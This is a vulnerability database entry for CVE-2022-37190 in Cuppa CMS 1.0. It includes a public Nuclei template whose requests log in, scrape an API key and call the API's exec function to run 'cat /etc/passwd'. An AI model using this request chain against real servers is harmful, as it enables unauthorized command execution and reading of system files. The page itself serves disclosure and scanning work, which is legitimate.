CVE-2022-37190: Cuppa CMS v1.0 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Cuppa CMS v1.0 | POC: 已公开

漏洞描述

CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php.

PoC代码[已公开]

id: CVE-2022-37190

info:
  name: Cuppa CMS v1.0 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37190
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37190
    cwe-id: CWE-732
    epss-score: 0.85111
    epss-percentile: 0.99306
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve2022,cve,rce,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_api_keys
      - |
        POST /api/index.php HTTP/1.1
        Host: {{Hostname}}
        key: {{apikey}}
        Content-Type: application/x-www-form-urlencoded

        action=system&function=exec&cmd=cat+/etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: header_3
        words:
          - "text/html"

      - type: regex
        regex:
          - "postgres:.*:1001:"
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: apikey
        group: 1
        regex:
          - "<td class='td_key'>(.*?)</td>"
        internal: true
# digest: 4a0a00473045022073a80480d6f43ea7cea208c3fe65dd573817d05a43d29fa38c27a716cc1684e102210087c515eb123825eed6a80010380a3b335daa202a188dca5c9ce4b4452676c0b3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐